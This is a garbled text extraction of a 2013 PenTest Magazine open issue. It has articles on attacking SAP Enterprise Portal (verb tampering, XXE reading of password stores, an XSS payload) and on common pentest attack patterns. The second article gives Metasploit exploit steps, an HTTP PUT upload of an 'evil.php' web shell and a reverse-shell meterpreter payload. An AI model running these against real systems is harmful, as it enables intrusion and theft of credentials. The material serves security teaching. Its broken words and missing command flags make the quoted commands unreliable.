Pentest Open 08 2013

Cyber Security Auditing Software

www.titania.com

Improve your Firewall Auditing As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and rewall devices. Any security issues identied within those technologies will then have to be explained in a way that both management and system maintainers can understand.

he network scanning phase of a penetration assessment will quickly identify a number of security

weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

www.titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titanias products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customers specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own companies styling. Each report can then be saved in a variety of formats for management of the issues.

Why not see for yourself, evaluate for free at titania.com

http://pentestmag.comOPEN 08/2013

Editor in Chief: Ewa [email protected]

Managing Editor: Michael [email protected]

Editorial Advisory Board: Jeff Weaver, Rebecca Wynn, William F. Slater, III

Betatesters & Proofreaders: Ayo Tayo Balogun, Juan Bidini, Mychael Brown, Elliot Bujan, Massimo Buso, Aidan Carty, Stephanie Castille, Amit Chugh, Gregory Chrysanthou, Amitay Dan, Dan Dieterle, Ewa Duranc, Pinto Elia, Dalibor Filipovic, Pilo Dx, Zbigniew Fiona, Nitin Goplani, Alexander Groisman, Mardian Gunawan, Hani Ragab Hassen, Jos Luis Herrera, Steve Hodge, David Jardin, Laney Kehel, Kyle Kennedy, David Kosorok, Gilles Lami, Mateo Martinez, Matteo Massaro, Dallas Moore, L. Motz, Michael Munt, Varun Nair, Phil Patrick, Davide Quarta, Sagar Rahalkar, Santosh Kumar Rana, Inaki Rodriguez, Micha Rogaczewski, Tahir Saleem, Robin Schroeder, Tim Singletary, Vinoth Sivasubramanian, David Small, Jeff Smith, Johan Snyman, Craig Thornton, Arnoud Tijssen, John J. Trinckes, Jakub Walczak, John Webb, Steven Wierckx, Lotfi Yassa and others

Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.

Senior Consultant/Publisher: Pawe Marciniak

CEO: Ewa Dudzic [email protected]

Production Director: Andrzej Kuca [email protected] Director: Ireneusz Pogroszewski [email protected]: Ireneusz Pogroszewski

Publisher: Hakin9 Media SK02-676 Warsaw, PolandPostepu 17DPhone: 1 917 338 3631www.pentestmag.com

Whilst every effort has been made to ensure the high quality of

the magazine, the editors make no warranty, express or implied,

concerning the results of content usage.

All trade marks presented in the magazine were used only for

informative purposes.

All rights to trade marks presented in the magazine are

reserved by the companies which own them.

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear PenTest Readers,

Long time has passed since we have prepared some-thing THAT special for members without a subscription! After long and profound research, we have created a beati-ful OPEN issue.

This time we have mainly focused on attack scenarios, as we know that you love it. However, remember - do not hurt anyone!

Most of included scenarios use BackTrack or Kali Linux. Even thought almost everybody knows this tools inside-out, we still hope that you will learn a lot of new things.

Articles describe such techniques as bypassing new gen-eration firewalls, taking over an active directory and hack-ing sap enterprise portal. We are certain everyone will find something interesting in this publication.

If you are reading these words right now, you may send us an email with your impressions on this publication. We need some feedback, so we can create more and better is-sues each time.

As there is not much to add, we will leave you with this brilliant lecture. Enjoy the reading!

Michael Rogaczewski& PenTest Team

http://pentestmag.comOPEN 08/2013

08 Hacking SAP Enterprise Portalby Dmitry ChastukhinBusiness applications have been and will always be the cherished goal of cybercriminals attacks. Such actions can have many purposes: industrial espionage, the de-sire to cause financial or reputational losses, sale of criti-cal information. In this article, I would like to tell in detail how a potential attacker can attack one of the most popu-lar modules of the SAP ERP system: SAP Enterprise Por-tal, and how such attacks can be avoided.

FROM: PenTest REGULAR 06/2013

16 Common Attack Patterns in Penetration Testingby Sumit Agarwal

A penetration testing project for assessing overall secu-rity of an organization covers testing of various aspects and layers of its security infrastructure. The idea of a pen-test is not just to check the existence of controls but to evaluate the sufficiency and appropriateness of these controls.

FROM: PenTest REGULAR 06/2013

26 Automating POST-Method CSRF Attacksby Justin Hutchens

Cross-Site Request Forgery is often compared to XSS (Cross-Site Scripting), but reallythis isnt accurate. XSS exploits a vulnerability on a target server to access, ma-nipulate, and exploit data on the client-side.

FROM: PenTest WEBAPP 01/2013

32 Blackhat Recon With Wiresharkby Lee Alexander KingOn unknown networks and black hat testing, Wireshark is a must-have tool to find critical information about your surroundings, infrastructure and potential vulnerabilities. Find out more together with Lee Alexander King.

FROM: PenTest EXTRA 06/2013

40 Bypassing new generation Firewalls with Meterpreter and SSH Tunnelsby Ignacio Sorribas

In this article we seen how in some cases the firewall de-tects malicious code and is capable of blocking the con-nections, but also demonstrated how easy it is to bypass this restriction.


48 Taking Over an Active Directoryby Gilad OfirAs Pentesters and Security Specialists, we often come across a need to secure infrastructure. This need is caused by the fact that our systems are constantly at risk from either internal or external attacks. The attack, which is demonstrated in the article, presents a simple scenario where an attacker does a simple takeover of an active di-rectory while using only backtrack and our knowledge, of course.


54 MS Internet Explorer Same ID Property Remote Code Execution Vulnerabilityby Praveen Parihar

In this article you will learn about concepts behind Inter-net Explorer memory corruption, what kinds of bypass techniques are used to launch buffer overflows, heap based and stack overflow attacks and return oriented programming concepts to exploit remote code execution vulnerabilities.


CONTENTS

OPEN 08/2013

58 Pass-The-Hash Attacksby Christopher AshbyPass-The-Hash (PTH) is a post exploitation attack tech-nique that is used to obtain user account hashes from ei-ther client workstations or domain servers and then use this information to elevate privileges and/or create new authenticated sessions. The technique is used after the attacker has gained access to your environment; special attention to the risk should be raised with regards to pro-tecting yourself against malicious insiders or rouge em-ployees.


64 From SQLi in Oracle to Remote Executionby Jose Selvi

SQL Injection is one of the most common vulnerabilities you can find in webapps. In fact, it is the number 1 vul-nerability on the famous OWASP Top 10. As you probably know, SQL Injection can be exploited in order to get all the information stored in a database, but that is not all we can do with this kind of vulnerability. Databases are complex systems and can be configured wrong or be out-dated. In this article the author writes about one possible target scenario: a SQL Injection that allows us to execute SQL statements on an Oracle 11g database in order to exploit its vulnerabilities and achieve a complete system pwning.


70 How to Detect SQL Injection Vulnerabilities in SOAPby Francesco Perna and Pietro Minniti

SQL Injections are a well known topic in web application security. So, why another article about that? Because not all the SQL injections are so obvious, and pentesters of-ten look for them only inside the web application GET/POST requests. In this article, the author writes about a real world example, where the automated vulnerability scanner tools failed to detect the SQL injection vulner-ability residing inside the SOAP web services code, in-voked by an MDI Windows application. Particularly, he describes the vulnerability exploitation phases starting from the detection to the database data acquisition using the commonly available tools.


CONTENTS

www.uat.edu > 877.UAT.GEEK

[ ITS IN YOUR DNA ]

[ GEEKED AT BIRTH ]

You can talk the talk.Can you walk the walk?

LEARN:Advancing Computer ScienceArti cial Life ProgrammingDigital Media Digital Video Enterprise Software DevelopmentGame Art and Animation Game DesignGame Programming Human-Computer Interaction Network Engineering Network SecurityOpen Source Technologies Robotics and Embedded Systems Serious Game and SimulationStrategic Technology Development Technology Forensics Technology Product DesignTechnology StudiesVirtual Modeling and DesignWeb and Social Media Technologies

Please see www.uat.edu/fastfacts for the latest information about degree program performance, placement and costs.

8 http://pentestmag.comPageOPEN 08/2013

Hking SAP Enterprise PortalBusiness applications have been and will always be the cherished goal of cybercriminals attacks. Such actions can have many purposes: industrial espionage, the desire to cause financial or reputational losses, sale of critical information. As a general rule, all attacks on business applications and systems are targeted, and are performed by quite qualified people.

In this article, I would like to tell in detail how a po-tential attacker can attack one of the most popu-lar modules of the SAP ERP system: SAP Enter-prise Portal, and how such attacks can be avoided.

SAP Enterprise Portal (EP) is the main system entry point for all users in the enterprise network. Portal, as a rule, is used within a company as the place where both public information (including com-pany news, employee data, and so on) and private data (internal documents, instructions, and orders) is stored and processed. Portal is also the place where network users can carry out their duties: edit documents, hold meetings and discussions, man-age users, or work with necessary tables.

A distinctive feature of SAP Portal is that it is linked to almost all of the other SAP components deployed in the corporate network, so compromis-ing SAP Portal will lead not only to compromising all of the information it contains, but also to turning it into a kind of springboard for further attacks of the hacker.

It is important to note that access to SAP EP can often be obtained from the Internet. This property of the module dispels the myth that SAP is not ac-cessible from the Internet. For example, using a simple Google Drk: inurl: /irj/portal, you can find a large number of SAP EPs available for con-nection (Figure 1).

Figure 1. Accessing EPs from Google

You can also use the Shdn search engine, which can as easily detect available SAP EPs (Fig-ure 2).

Figure 2. Searching for EPs via Shodan

Article comes from Pen Test REGULAR.

Download the complete issue.

There is shortage of 5,00,000 information security professionals in India according to the National Cyber Security Policy, 2013.The Ground Zero Summit, Asias largest Information Security Summit, promoted by the Information security Consortium is the first step towards securing our cyber frontiers.

Be there, Register Today.

Prominent speakers presenting at the summit are:

Keynote Speakers

Dr. Gulshan Rai, Director, CERT In

Dr. Nirmaljeet Singh Kalsi, Ministry of Home Affairs, Government of India

Capt. Raghu Ram, CEO, National Intelligence Grid (Natgrid)

International Speakers

Alexander Polyakov, CTO, ERPSCAN

Enrique Patricio Calot, CEO, Cloodie SA

Filol Eric, Head of Research, ESIEA CVO LAB

And many more

Executed byProduced byOnline Media PartnerMedia Partner

THE BUSINESS VALUE OF TECHNOLOGY

For delegate contact:

Lokesh Bhardwaj | M: +91 95882 11188, +91 99208 42798 | E: [email protected]

Platinum Partner Academia PartnerGold Partner Supporting Associations


The popularity of SAP EP and its availability on the Internet makes it a desirable entry point for hackers who are choosing the spot to attack com-panies of various size and industry.

Lets take a look at SAP Portal in more detail.

ArchitectureIn order to understand specific attacks on SAP EP, you should first look at its architecture, shown in Fig-ure 3. As can be seen on the scheme, the system is based on Web Application Server (SAP J2EE), which provides the context where Portal operates. EP itself is a platform where all kinds of entities op-erate. The foremost of them are iViews, Applica-tions, web services, and single Components.

The scheme shows that SAP Portal has links to the database where data is stored, as well as to many other SAP components and models.

Now that you can picture the basic architectural layout, let us move on to the possible Portal attack vectors.

SAP Portal attacks SAP NetWeaver J2EE

Verb Tampering

Since SAP NetWeaver J2EE is the basis of SAP EP, it is important to understand how an attacker can compromise J2EE. It requires understanding some nuances of how J2EE applications operate.

Access to applications running on J2EE is de-fined by the developers using the descriptor file called web.xml.

An example of such descriptor file follows in List-ing 1. Lets take a closer look. The most impor-tant tags in this file are: servlet-name, defining the name of the servlet; http-method, which defines the HTTP method used to access the servlet, and role-name, which defines the necessary role to ac-cess the servlet.

Thus, in order to access the servlet CritilAtin, a user must make a get request and have the role administrator.

However, authentication can be bypassed in this case. The issue is that, if a user makes a request which is not GET, the user role will not be checked. Developers, as a rule, restrict ac-cess to the application for GET and POST meth-ods, but typically forget about the HEAD method, which is similar to GET, except for one differ-ence it does not return the body of the server

Figure 3. SAP EP architecture


response. However, if an attacker finds an ap-plication that does not require server responses, he may try exploiting this error.

For example, he can use a servlet known as CTC, which requires authentication when using GET and POST methods and allows managing us-ers in SAP Portal: creating, deleting users, moving them from group to group. This is quite suitable for the attacker because in a request to create a user, it is important to send the request rather than to re-ceive the response.

Thus, using only two requests to SAP Portal, the attacker can gain administrative access to the SAP system:

Create a new user blabla with a password blbl

Add the user to the group Administrators

This type of attack is called Verb Tampering. To secure your system:

Install SAP notes: 1503579, 1616259. Check all web.xml files. This can be done us-

ing the ERPSn WEB.XML Checker utility.

More details on Verb Tampering are available in Metasploit and ERPScan Pentesting Tool.

Invoker ServletLets take a look at web.xml once again (Listing 2).

Pay attention to another important tag: url-pattern, which describes the URI to access the servlet.

So if a user makes a get request to the URI /ad-min/critical/CritilAtin, they will have access to the CritilAtin servlet, if they have the role ad-ministrator.

However, an attacker can bypass authentication and access the servlet here as well. The issue is that the InvkerServlet mechanism is enabled in SAP by default, which allows calling servlets by specially formed links. So an attacker can call the servlet CritilAtin by the URI /servlet/com.sap.admin.critical.action and get access having no role because this URI does not match the one specified in url-pattern.

To attack actual SAP systems, an attacker can again use the CTC servlet. In addition to user con-trol, it allows executing commands in the OS where SAP Portal operates, for example, create user.

Figure 4 shows the ipconfig command executed on the SAP Portal server.

Listing 1. web.xml descriptor file

CriticalAction com.sap.admin.Critical.

Action

CriticalAction


Figure 4. ipconfig command executed on the SAP Portal server

To secure your system: Install SAP notes: 1467771, 1445998 Check all web.xml files. This can be done us-

ing the ERPSn WEB.XML Checker utility.

Portal Security Zone Lets move on to possible attacks aimed directly at the Portal. EP has an entity called Security Zone which serves as an additional tool to configure ac-cess to Portal programs (iViews).

The zones are defined for each application in the descriptor file prtlpps.xml. They have such a critical parameter as Safety Level, which is re-sponsible for the level of access to the application. There are 4 Safety Levels:

No Safety Anonymous users are permitted to access

portal components defined in the security zone.

Low Safety A user must be at least an authenticated

portal user to access portal components de-fined in the security zone.

Medium Safety A user must be assigned to a particular por-

tal role that is authorized to access portal components defined in the security zone

High Safety A user must be assigned to a portal role

with higher administrative rights that is au-thorized to access portal components de-fined in the security zone

Developers ought to be very careful when defin-ing Safety Level because it is the only thing which will be checked if a user calls, for example, an iView by direct URL:

/irj/servlet/prt/portal/prtroot/

In SAP EP, a range of applications was found with Safety Level = No Safety, containing critical func-tions or vulnerabilities of various kinds.To secure your system:

Check the Safety Level settings in your appli-cations

Use SAP guidelines: http://help.sap.com/saphelp_nw70/helpdata/

en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm

http://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm

XSSSAP EP is a web application, so it is liable to all vulnerabilities which are characteristic of web applications. One of them is cross-site scripting (XSS). However, in contrast to the classical pay-load for this kind of attacks, during an attack on Portal an attacker can use the specific features of EP: for example, the EPCF technology which allows accessing user data through a special JavaScript API.An example of such payload:

alert(EPCM.loadClientData(urn:com.sap.myObjects, person);

To secure your system: Install SAP notes: 1656549.

Directory traversalIt is yet another classic attack on web applications. Sometimes, however, it has its own special fea-tures: for example, directory traversal is not per-formed by the classic characters / .. /, but rather by ! 252f.. ! 252f.

To secure your system: Install SAP notes: 1630293.

XML External Entity It is also a classical attack on XML transport web applications. Because XML is one of the main transports in SAP Enterprise Portal, a potential attacker may attempt to compromise the system


through it. This section will describe how an attack-er can gain administrative access to SAP EP.

Such an attack is based on the fact that SAP has a special password storage called SAP Secu-rity Storage, which is located in the file SeStre.prperties. Passwords are encrypted, but the key

Figure 6. XML found in the XXE request to Portal

Figure 5. XXE request to Portal as seen in a sniffer

to decrypt them is located in the same directory as the passwords (in the file SeStre.key).

So if an attacker is able to read these files, they will be able to decrypt passwords and gain admin-istrative access to Portal.

This attack can be carried out in several stages:

Figure 7. Reading files from the SAP Portal server using an XXE vulnerability


Find a vulnerability that allows you to read files on the SAP Portal server.

Read the file SeStre.prperties with encrypt-ed passwords.

Read the file SeStre.key with the key to de-crypt passwords.

Decrypt the administrative password and gain access to SAP EP.

The vulnerability to allow reading files from the SAP EP server can be one of the previously de-scribed bugs. It can be Directory Traversal or Command Execution. I would like to demonstrate XML eXternal Entity (XXE) separately.

Figure 5 shows how a typical request to Portal looks in a sniffer.

You can see a great number of parameters in the POST request, and, if we look closer, we will find XML in one of the parameters (Figure 6).

It is where we will implement the request which will return the content of the files SeStre.prperties and SeStre.key.

After the files are successfully read, they can be decrypted with the utility ERPSn SeStre de-scriptor.

To do this, launch the SeStre_Cr.jar file in the same directory where the passwords and key files received from the server are located, and specify the SID of the system. As a result of its work, the utility displays the decrypted passwords and other service information (Figure 8).

Figure 8. SecStore_Cr.jar file decrypting passwords and other info

To secure your system:

Install SAP note 1619539 Restrict read access to files SecStore.proper-

ties and SecStore.key

Information DisclosureSAP Portal is shipped with many services, which can be used by hackers to obtain information when planning attacks on the system. However, there may be other vectors of attack development. For example, an attacker could use Portal as the

ground for further action. Portal stores a lot of doc-uments, so using a simple internal search mecha-nism and queries like secret or password, an attacker can learn a lot of confidential information (Figure 9).

Figure 9. Portals internal search engine shows results for password

To secure your system: restrict read access to im-portant or sensitive information stored in SAP EP.

ConclusionSAP Enterprise Portal is the most interesting target for hackers who aim to gain access to corporate data because of the popularity of this SAP mod-ule. This is why its security undoubtedly requires increased attention to be paid both by system ad-ministrators and the developers, and even by com-mon users.

PS: All the vulnerabilities presented in this article have been fixed in cooperation with SAPs Product Security Response Team more than a year ago.

PPS: Not all the possible attacks on SAP EP are described in this article, but all the latest informa-tion related to the security of the SAP ERP system is available at http://erpsn.m.

DMItry CHAStukHInDirector of SAP Pentesting Department ([email protected]).


Common Attack Patterns in Penetration testingInvincibility lies in the defence; the possibility of victory in the attack

-Sun Tzu

Apenetration testing project for assessing overall security of an organization covers testing of various aspects and layers of its security infrastructure. The idea of a pentest is not just to check the existence of controls but to evalu-ate the sufficiency and appropriateness of these controls.

It is often observed that multi national compa-nies invest quite a lot in wide-ranging fancy secu-rity products without evaluating their appropriate-ness. These fancy solutions however provide a false sense of security and leave many holes un-plugged. A security infrastructure when not aligned with the organizations business needs fails to reap desired return on investment.

Mostly, the concept of layered defence is mis-interpreted as putting a number of security mea-sures one after the other to act as a backup in case one fails. Such plans often cater for multiple failure possibilities but leave out safeguarding multiple entry points. The actual idea of layered defence is implementation of appropriate controls at vari-ous vulnerable entry points such that all identified weaknesses are sufficiently safeguarded.

Hence that general is skillful in attack whose op-ponent does not know what to defend; and he is

skillful in defense whose opponent does not know what to attack

-Sun Tzu

Multi-Pronged Attack MethodologyA multi-pronged attack methodology looks for pos-sible weaknesses at various layers of security. The robustness and efficiency of layered defence is put to test for finding an entry point. Sometimes, it is as easy as finding an unprotected entry point or a se-curity control in its default configuration but most of the times it requires proper planning and thorough knowledge of the environment to bypass the safe-guards and break through.

The model of a multi-pronged attack methodol-ogy to penetrate a layered security architecture is depicted in Figure 1.

Attacking ISO 7498-2Another approach for breaking through a layered security can be thought of keeping the OSI Security

Article comes from Pen Test REGULAR.



architecture reference model (ISO 7498-2) in per-spective (Figure 2)

Attack Patterns in Penetration testingIn order to identify weakness and blow holes in a robust security architecture with layered defence, it is important to have complete understanding of the environment.

A typical penetration testing attack is carried out in three phases (Figure 3).

Nobody ever defended anything successfully, there is only attack and attack and attack some more.

- George S. Patton

Pentest Case Study See Figure 4.

Information GatheringInformation gathering is the most critical and most time consuming phase of the penetration test. This phase prepares the ground for the pentester to launch appropriate scans and exploits at later

stages. Any mistake in information gathering or analysis may compromise the complete pentest-ing assignment. Information gathering involves

Figure 1. Multi-pronged attack methodology

Figure 2. Attacking OSI layers


harvesting of complete information about the tar-get network, platform, and environment.

HttP Banner Grabbing Http headers can provide quite a lot of informa-tion about a Web Server. For example, web-serv-er/ version, web application, Allowed Http Meth-ods, etc.

Figure 3. Phases of a Typical PenTest

Figure 4. Network Diagram of a PenTest Scenario

Listing 1. Using Netca

nc -v 172.26.1.2 80 HEAD / HTTP/1.0

HTTP/1.1 200 OKContent-Length: 230Content-Type: text/htmlContent-Location: http://172.26.1.2/MyWebIn-

terface.htmLast-Modified: Sat, 29 Aug 2013 16:03:16 GMTAccept-Ranges: bytesETag: 9a34bcfd0a023:41a2Server: Microsoft-IIS/6.0MicrosoftOfficeWebServer: 5.0_PubX-Powered-By: ASP.NETDate: Fri, 13 Sep 2013 22:10:40 GMTConnection: close


using netcatSee Listing 1.

using telnetSee Listing 2.Mapping the Network (in case of publically acces-sible web servers).

using Whois

whois whois

This will provide information about domain regis-trar, network range, net-block owner information, and administrators information like name, contact number, and e-mail ids in some cases.

using nslookup

nslookup

This will query DNS Server to obtain IP address mapping and DNS record information.

nslookup q=mx

This will obtain the MX (Mail Exchange) record in-formation for the particular domain.

using Dig

Dig mx

This will fetch the MX record information of the target domain.

Querying SMtP Server

telnet 172.26.1.6 25

This will fetch the SMTP banner information.Internal network topology can be discovered

by forwarding an e-mail to a non-existent user in the domain and then analyzing headers of the bounced mail. The header information will reveal ip addresses of servers through the mail path.

using traceroute

tracert tracert

This will trace the complete route which a packet traverses to reach the destination. The traceroute information also gives an idea where network de-vices/routers/firewalls are placed in the path. To-tal number of hops required to reach destination is also revealed by traceroute. This information when analyzed in conjunction with the TTL(Time To Live) information obtained from pinging the tar-get will help in identifying the operating system of the target host.

Listing 2. Using Telnet

telnet 172.26.1.2 80Trying 172.26.1.2Connected to 172.26.1.2.Escape character is ^].HEAD / HTTP/1.0

HTTP/1.1 200 OKCache-Control: privateContent-Length: 1777Content-Type: text/htmlServer: Microsoft-IIS/6.0Set-Cookie: ASPSESSIONIDACBATBQQ=MYAASDJOASR

TWD; path=/X-Powered-By: ASP.NETDate: Fri, 13 Sep 2013 22:10:40 GMTConnection: closeConnection closed by foreign host

telnet 172.26.1.2 80Trying 172.26.1.2Connected to 172.26.1.2.Escape character is ^].OPTIONS / HTTP/1.0

HTTP/1.1 200 OKAllow: OPTIONS, TRACE, GET, HEAD, PUT, COPY,

SEARCH, POSTServer: Microsoft-IIS/6.0Public: OPTIONS, TRACE, GET, HEAD, PUT, COPY,

SEARCH, POSTX-Powered-By: ASP.NETDate: Fri, 13 Sep 2013 22:10:40 GMTConnection: closeContent-Length: 0Connection closed by foreign host.


Host Discovery with nmapScenario 1: Firewall with no Filtering

pass from any to anyNmap Command: \ > nmap sP 172.26.1.0/29

Result: All hosts found.

Scenario 2: Firewall with Generic rule Set

pass from any to any proto tcp port 80/25/53drop allNmap Command: \ > nmap sP 172.26.1.0/29

Result: Still all hosts found (TCP pings for port 80 get through, ICMP packets are blocked).

Scenario 3: Firewall with Specific rules

pass from any to 172.126.1.2 proto tcp port 80pass from any to 172.126.1.4 proto tcp port 53pass from any to 172.126.1.6 proto tcp port 25drop allNmap Command: \ > nmap sP 172.26.1.0/29

Result: Only Web Server gets detected (TCP pings for port 80 on 172.126.1.2 gets through).

Scenario 4: Stateful Firewall with Specific rules

pass from any to 172.126.1.2 proto tcp port 80 keep state



drop allNmap Command: \ > nmap sP 172.26.1.0/29

Result: No hosts found (ICMP dropped, TCP Ack packets dropped because they are not part of any previously established connection).

Solution for scenarios 3, 4

Nmap Command: \ > nmap sP PS25,53,80 172.26.1.0/29

Result: 03 hosts found (passes stateful firewall as -PS option sets the SYN flag instead of Ack).

Listing 3. OS detection with nmap

nmap O 172.26.1.10Starting Nmap ( http://nmap.org )Nmap scan report for 172.26.1.10Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http646/tcp filtered ldp1720/tcp filtered H.323/Q.9319929/tcp open nping-echo31337/tcp open EliteDevice type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6.39OS details: Linux 2.6.39Uptime guess: 1.674 days (since Mon Sep 9

12:03:04 2013)Network Distance: 10 hopsTCP Sequence Prediction: Difficulty=205 (Good

luck!)IP ID Sequence Generation: All zeros

Listing 4. Services and version detection with nmap

nmap sV 172.26.1.2Starting Nmap ( http://nmap.org )Nmap scan report for 172.26.1.2Host is up (0.15s latency).Not shown: 992 closed portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS

httpd 6.0

nmap sV 172.26.1.6Starting Nmap ( http://nmap.org )Nmap scan report for 172.26.1.6Host is up (0.016s latency).Not shown: 95 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)25/tcp open smtp Postfix smtpd80/tcp open http Apache httpd 2.2.3

((CentOS))113/tcp closed auth443/tcp open ssl/http Apache httpd 2.2.3

((CentOS))


Vulnerability DetectionThis phase focuses on scanning of hosts for open ports and identifying vulnerable services running on them, and prepares the ground work for launch-ing appropriate exploits in the exploitation phase.

OS Detection with nmapSee Listing 3.

Services and Version Detection with nmapSee Listing 4.

Scanning a Firewall for Security Weaknesses A firewall may be blocking certain types of scans based on its rule set. Therefore, a pentester needs to probe it with unconventional scans which might get through a generic rule set. Once the allowed packet types are known, the internal network can be probed further.

TCP Null Scan: nmap sN 192.168.5.1TCP FIN Scan: nmap sF 192.168.5.1TCP X-MAS Scan: nmap sX 192.168.5.1

Scanning a Firewall for Packet Fragments In order to identify MTU size (Maximum Transmis-sion Unit) allowed by the firewall, it can be probed with various packet fragment sizes.

nmap f 10 192.168.5.1nmap --mtu 32 192.168.5.1

This will split up the TCP header over several packets to bypass detection by packet filters/IDS (Intrusion Detection Systems).

Vulnerability Scanning of Hosts with nessus/OpenVASVulnerability scanners like nessus and openvas provide a deep insight into weaknesses of the scanned hosts. These tools also map the criticality of weaknesses discovered on a scale of High, Me-dium, and Low along with CVE (Common Vulner-abilities and Exposures) and exploits.

Web Application Scanning and Enumeration Web application scanning involves enumera-tion, testing, and analysis of application servers, web technologies, CMS(Content Management System), database server, authentication and authorization mechanisms, session manage-ment, injection flaws, and business layer logic. OWASP (Open Web Application Security Proj-ect) has classified various weaknesses/vulner-abilities associated with web applications under OWASP Top 10.

Figure 5. Burpsuite web proxy


using Automated Scanning tools: W3af / Acunetix / netsparker A typical web application can be scanned for vul-nerabilities by various automated scanning tools like w3af, acunetix, netsparker, and more. These tools probe the application with a variety of pay-loads for detecting well known vulnerabilities. The result of a probe is completely based on a typi-cal response code/header/format. Therefore, such scans are prone to false positives and more worry-ingly, false negatives.

Manual Probing using Web-Proxies: ZAP/ Webscarab / Burpsuite Web proxies give the pentester privileges to inter-cept, analyze, tamper, and inject payloads in the requests/responses being communicated between clients browser and web application server.

This approach empowers the pentester to test the application for entry points by manipulating re-quest/response headers himself. Also, the busi-ness logic layer of the application can be manually evaluated unlike most automated tools.

Brute-forcing Directory Paths using Directory-busterDirBuster lists various accessible directories on a web server by brute forcing common directory names and paths. This tool often reveals some im-portant configuration files/administrator files on a misconfigured web server (Figure 6).

Figure 6. Directory brute forcing by DirBuster

testing for SQLI using Havij/SqlmapTools like havij and sqlmap enables the pentester to test the web application for potential SQLi (SQL Injection) flaws.

python sqlmap.py -u http://172.26.1.2/page.php?id=5

This will test the url parameter id against a set of injection payloads. If the application is found vul-nerable, the entire database can be accessed and taken over.

Common CMS Enumeration using wpscan/joomscan/DPScanEnumeration of common CMS (Content Manage-ment Systems) versions and modules can be done by automated scripts/tools like Droopal, Joomla, or WordPress (Figure 7).

Figure 7. Content Management System Enumeration

Discovery of vulnerable CMS versions/modules may lead to complete web application exploitation and control at a later stage.

ExploitationThis is the final phase of a penetration testing at-tack, which involves exploitation of vulnerabilities discovered in previous phases. Successful exploi-tation will provide complete control of hosts to the pentester.

Exploiting Default Configurations More often than not it is found that devices/sys-tems/servers are left in their default configurations. A pentester shall look for default ports/services commonly used for remote administration of fire-walls/network devices. A comprehensive list of de-fault passwords for various devices can be found at www.routerpasswords.com. Once the control of firewall/device has been obtained, modifying Rule-sets/ACLs and exploiting internal hosts is a cake-walk for the pentester.

Not only network devices but servers are also prone to this misconfiguration flaw. A default CMS login or a publically accessible configuration file


discovered by DirBuster can give complete control of the web server to a pentester.

Password Cracking In case there is no joy with default passwords, the password cracking approach may be resorted to. Dictionary attack or brute-forcing attack using tools like Hydra, Brutus, Medusa, and more, provides a pentester with privileged access to the applica-tion. These tools can also be configured to restart the brute force session after certain number of at-tempts so as to bypass the restriction of maximum invalid attempts in a particular session.

Hash CrackingExploiting a web application database with SQLi often provides passwords in the form of encrypted hashes. Such hashes can be broken using tools like Hashcat, Rainbow Tables, and others.

Exploit LaunchingBased on vulnerabilities detected in the vulner-ability scanning phase, relevant exploits can be launched on hosts using tools like Metasploit, Core Impact, Canvas, and more.

msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show targets ...targets...msf exploit(ms08_067_netapi) > set TARGET

msf exploit(ms08_067_netapi) > show options ...show and set options...msf exploit(ms08_067_netapi) > exploit

Exploiting dangerous http methods discovered in the reconnaissance phase: The PUT method dis-covered in the recce phase can be exploited to upload a php web shell on the web server.

Nc 172.26.1.2 80PUT /evil.php HTTP/1.0Content-type: text/htmlContent-length: 250

The uploaded webshell will be available at http://172.26.1.2/evil.php which in turn will pro-vide access to file system of the web server. In-stead of a webshell evil.php can also be used as a metasploit php payload.

msf > use payload/php/meterpreter_reverse_tcp msf payload(meterpreter_reverse_tcp) > show options

...show and set options... msf payload(meterpreter_reverse_tcp) > run

This will facilitate an interactive meterpreter ses-sion of the web server which could be exploited further for privilege escalation.

Web Application FuzzingA pentester should employ various means to by-pass authentication and authorization restrictions in a Web Application. Cookie Stealing by using Cross Site Scripting attacks may allow the attacker to hijack a valid user session. SQLi may provide database access, and CMS vulnerability exploita-tion can give website control to the attacker. Based on the version/vulnerabilities in CMS detected in the previous phase, an attacker can launch ex-ploits on the CMS. Business Logic Bypass/Fuzz-ing can allow an authenticated user to escalate his privileges. Most of the times applications authenti-cate a user from the database and then authorize the user to certain roles based on the cookie value set for him. Such a loosely binded authorization model can be exploited by tampering cookie val-ues (using Zed Attack proxy, burp-suite, firebug, or tamper data) to that of an administrator so as to gain administrator privileges (Figure 8).

Figure 8. Cookie tampering using Tamper Data

